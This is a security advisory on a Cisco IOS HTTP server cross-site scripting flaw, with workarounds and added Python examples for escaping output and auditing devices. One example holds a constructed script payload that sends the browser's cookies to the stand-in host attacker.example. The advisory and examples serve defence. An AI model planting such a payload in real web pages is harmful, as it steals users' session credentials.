"The Cisco IOS Web browser interface (which enables the device to perform as an HTTP server) allows configuration and monitoring of a router or access server using any web browser."
Because dynamically generated output is not filtered before it is returned to the browser, an attacker can inject HTML into content served by the Cisco IOS HTTP Server. The result is a cross-site scripting attack against a user browsing the device's web interface, which can be used to issue commands to the device at that user's privilege level.
Credit:
The information has been provided by the Cisco Systems Product Security Incident Response Team (PSIRT).
The original article can be found at: http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml
Vulnerable Systems:
* Cisco IOS versions 11.0 through 12.4 with the HTTP server or HTTP secure server enabled
Immune Systems:
* Cisco IOS XR
The Cisco IOS Web browser interface (which enables the device to perform as an HTTP server) allows configuration and monitoring of a router or access server using any web browser. This feature was introduced in IOS 11.0.
A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output of a "show buffers" command, is passed unmodified to the browser requesting the page. The browser interprets this HTML, which allows an attacker to execute commands against the device in the context of the browsing user, or to carry out other cross-site scripting attacks. Successful exploitation requires that a user browse a page containing dynamic content into which HTML has been injected.
The injected code lives only in device memory, so to be exposed a user must browse and view the tainted content while it is still present. If no user browses contaminated dynamic content on the device, exploitation is not possible.
A proof of concept exploit exists for this vulnerability; it attempts to reset the enable password on the device. Because the injected code runs in the browser of the user viewing the tainted content, any commands it issues against the device execute at or below the privilege level for which that user is authenticated and authorized.
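The following is an added illustration of the flaw class described above; it is not Cisco's code and does not reproduce the proof-of-concept exploit mentioned in the advisory. A hypothetical page generator splices "show" output into HTML verbatim (the vulnerable pattern) beside one that entity-encodes every dynamic string (what a fix in the HTTP server has to do). The buffer listing, the payload inside it and the page template are all constructed for the example.

```python
import html

# Constructed sample: a line such as a "show buffers ... dump" style listing could carry
# after an attacker sent the device a packet whose payload is HTML. Payload is made up.
ATTACKER_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
TAINTED_OUTPUT = (
    "Buffer information for Small buffer at 0x0\n"
    f"  data: GET /{ATTACKER_PAYLOAD} HTTP/1.0\n"
)

# Hypothetical page template; IOS's real markup is not known to this example.
PAGE = "<html><body><h1>{title}</h1><pre>{body}</pre></body></html>"


def render_unescaped(command: str, output: str) -> str:
    """Vulnerable pattern: dynamic text is inserted into the page verbatim, so any
    markup that happens to be inside the command output is parsed by the browser."""
    return PAGE.format(title=command, body=output)


def render_escaped(command: str, output: str) -> str:
    """Hardened pattern: every dynamic string is entity-encoded before insertion,
    so the browser displays the attacker's text as text and never sees a live tag."""
    return PAGE.format(title=html.escape(command, quote=True),
                       body=html.escape(output, quote=True))


def has_live_script(page: str) -> bool:
    """True when a <script> start tag survives in the markup (the template has none)."""
    return "<script" in page.lower()


def operator_sees_same_text(page: str, output: str) -> bool:
    """Encoding must not change what the operator reads: decoding the <pre> body
    gives back the original command output exactly."""
    start = page.index("<pre>") + len("<pre>")
    end = page.index("</pre>")
    return html.unescape(page[start:end]) == output


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        page = render("show buffers", TAINTED_OUTPUT)
        print(f"{name:9} live <script> in page: {has_live_script(page)}")
```

Operators cannot apply this change to IOS themselves; the point is what the fixed software must do, and why the interim workarounds below concentrate on not serving dynamic content at all.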
This security advisory applies to all Cisco products that run Cisco IOS Software versions 11.0 through 12.4 with the HTTP server enabled. A system which contains the IOS HTTP server or HTTP secure server, but does not have it enabled, is not affected.
To determine if the HTTP server is running on your device, issue the "show ip http server status" and "show ip http server secure status" commands at the prompt and look for output similar to:
Router>show ip http server status
HTTP server status: Enabled
If the device is not running the HTTP server, you should see output similar to:
Router>show ip http server status
HTTP server status: Disabled
Workarounds:
Disable the HTTP server:
If the HTTP server is not used for any legitimate purposes on the device, it is a best practice to disable it by issuing the following commands in configure mode:
no ip http server
no ip http secure-server
Disable the HTTP WEB_EXEC service:
A feature was introduced in 12.3(14)T and later in which selective HTTP and HTTPS services can be enabled or disabled. Two typical services are WEB_EXEC and the IOS Certificate Server (SCEP). The WEB_EXEC service lets remote clients configure the device and retrieve its current state. The IOS Certificate Server service lets remote clients enroll and obtain crypto certificates.
It is possible to disable the WEB_EXEC service while leaving SCEP running to serve certificates. If an installation requires the SCEP service, disable the WEB_EXEC service with the following commands in configure mode:
no ip http active-session-modules WEB_EXEC
no ip http secure-active-session-modules WEB_EXEC
Avoid the use of Web-based SHOW commands:
Successful exploitation of this vulnerability requires an unsuspecting user to request dynamic content from the device via the "show" commands available in the web interface. For some installations it may be acceptable to avoid issuing those commands through the web interface until an upgrade to fixed software is possible.
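The check-and-mitigate procedure above (confirm the version range, confirm whether the HTTP or HTTPS server is enabled, then pick the workaround) can be turned into a small audit routine run against saved command output. The following is an added example, not a Cisco tool: it parses constructed "show version" and "show ip http server status" / "show ip http server secure status" text in the format of the real commands and returns the workaround commands quoted in the advisory. The regular expressions, the sample outputs and the rule for deciding whether an image supports "ip http active-session-modules" (12.3(14)T and later T releases, or any 12.4 image) are assumptions of this example and should be confirmed against Cisco's release documentation.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Affected range stated in the advisory: IOS 11.0 through 12.4 (major, minor).
AFFECTED_MIN = (11, 0)
AFFECTED_MAX = (12, 4)

# Matches the "Version 12.3(14)T7" token of "show version". Assumed regex, not Cisco's.
VERSION_RE = re.compile(r"Version (\d+)\.(\d+)\((\d+)[^)]*\)([A-Za-z]*)")
# Matches both "HTTP server status: Enabled" and "HTTP secure server status: Disabled".
STATUS_RE = re.compile(r"HTTP (secure )?server status:\s*(Enabled|Disabled)", re.I)


@dataclass(frozen=True)
class IosVersion:
    major: int
    minor: int
    maint: int
    train: str          # release train letters, e.g. "T"; "" for mainline


@dataclass
class Assessment:
    affected: bool
    reason: str
    commands: List[str] = field(default_factory=list)


def parse_version(show_version: str) -> Optional[IosVersion]:
    """Return the IOS version, or None when the image is IOS XR (listed as immune)."""
    if "IOS XR" in show_version:
        return None
    m = VERSION_RE.search(show_version)
    if not m:
        raise ValueError("no IOS version string found in show version output")
    return IosVersion(int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4).upper())


def http_status(show_status: str) -> dict:
    """Parse the concatenated output of 'show ip http server status' and
    'show ip http server secure status' into {'http': bool, 'https': bool}."""
    status = {"http": False, "https": False}
    for m in STATUS_RE.finditer(show_status):
        key = "https" if m.group(1) else "http"
        status[key] = m.group(2).lower() == "enabled"
    return status


def supports_session_modules(v: IosVersion) -> bool:
    """Heuristic (assumption of this example) for the selective-service feature the
    advisory dates to 12.3(14)T: 12.3(14)T and later T releases, or any 12.4 image."""
    if (v.major, v.minor) >= (12, 4):
        return True
    return (v.major, v.minor) == (12, 3) and v.maint >= 14 and "T" in v.train


def assess(show_version: str, show_status: str, scep_required: bool = False) -> Assessment:
    """Decide whether a device is exposed and which advisory workaround fits it."""
    v = parse_version(show_version)
    if v is None:
        return Assessment(False, "IOS XR is not affected")
    if not (AFFECTED_MIN <= (v.major, v.minor) <= AFFECTED_MAX):
        return Assessment(False, f"IOS {v.major}.{v.minor} is outside 11.0 through 12.4")
    st = http_status(show_status)
    if not (st["http"] or st["https"]):
        return Assessment(False, "HTTP server present but not enabled")
    if scep_required and supports_session_modules(v):
        # Keep the certificate server (SCEP) reachable; drop only the WEB_EXEC module.
        return Assessment(True, "HTTP server enabled and SCEP needed: disable WEB_EXEC only",
                          ["no ip http active-session-modules WEB_EXEC",
                           "no ip http secure-active-session-modules WEB_EXEC"])
    return Assessment(True, "HTTP server enabled with no legitimate use: disable it",
                      ["no ip http server", "no ip http secure-server"])


# Constructed sample outputs in the format of the real commands (not captured from a device).
SHOW_VERSION_12_3_14T = ("Cisco IOS Software, C2600 Software (C2600-ADVIPSERVICESK9-M), "
                         "Version 12.3(14)T7, RELEASE SOFTWARE (fc2)")
SHOW_VERSION_12_0 = "IOS (tm) 2500 Software (C2500-I-L), Version 12.0(7)T,  RELEASE SOFTWARE (fc2)"
SHOW_VERSION_XR = "Cisco IOS XR Software (Cisco CRS-8/S), Version 3.3.0[00]"
STATUS_HTTP_ENABLED = ("HTTP server status: Enabled\nHTTP server port: 80\n"
                       "HTTP secure server status: Disabled\n")
STATUS_ALL_DISABLED = ("HTTP server status: Disabled\nHTTP server port: 80\n"
                       "HTTP secure server status: Disabled\n")

if __name__ == "__main__":
    samples = (("12.3(14)T7", SHOW_VERSION_12_3_14T), ("12.0(7)T", SHOW_VERSION_12_0),
               ("IOS XR", SHOW_VERSION_XR))
    for label, ver in samples:
        for scep in (False, True):
            a = assess(ver, STATUS_HTTP_ENABLED, scep_required=scep)
            print(f"{label:10} scep={scep!s:5} affected={a.affected!s:5} {a.reason}")
            for cmd in a.commands:
                print("    ", cmd)
```

A device on 12.0(7)T that still needs SCEP gets the full "no ip http server" workaround, because the selective-module commands are not available to it; the only alternatives there are the web-based "show" avoidance described above or an upgrade.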